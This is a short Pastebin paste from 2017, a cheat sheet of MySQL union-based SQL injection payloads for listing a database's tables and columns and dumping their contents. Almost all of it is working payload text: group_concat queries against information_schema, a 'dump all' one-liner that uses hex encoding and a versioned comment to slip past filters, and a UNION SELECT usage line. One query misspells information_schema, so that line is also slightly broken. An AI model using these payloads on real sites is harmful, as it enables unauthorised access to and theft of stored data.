Advertisement
ZackPenta

SQL injection (getting table name ,col name and data)

Jul 9th, 2017
135
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
SQL 0.68 KB | None | 0 0
  1. //dump ALL TABLES FROM DATABASE name
  2. group_concat(TABLE_NAME)
  3.  
  4. FROM information_schmema.TABLES WHERE table_schema=DATABASE()
  5.  
  6.  
  7. //dump COLUMNS FROM TABLE
  8. group_concat(column_name)
  9.  
  10. FROM information_schema.COLUMNS WHERE table_schema=DATABASE() AND TABLE_NAME='yourtable'
  11.  
  12. //dump datas FROM COLUMNS
  13. group_concat(column1,0x3a,column2)
  14.  
  15. FROM yourtablename
  16.  
  17. //dump ALL we want
  18. (SELECT (@x) FROM (SELECT (@x:=0x00), (SELECT (0) FROM (information_schema.COLUMNS) WHERE (table_schema!=0x696e666f726d6174696f6e5f736368656d61) AND (0x00) IN (@x:=/*!50000concat*/(@x,0x3c62723e,table_schema,0x272d2d3e27,TABLE_NAME,0x272d2d3e27,column_name))))x)
  19.  
  20.  
  21. //usage
  22. UNION SELECT 1,2,3,4,5,6,7,8,9
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement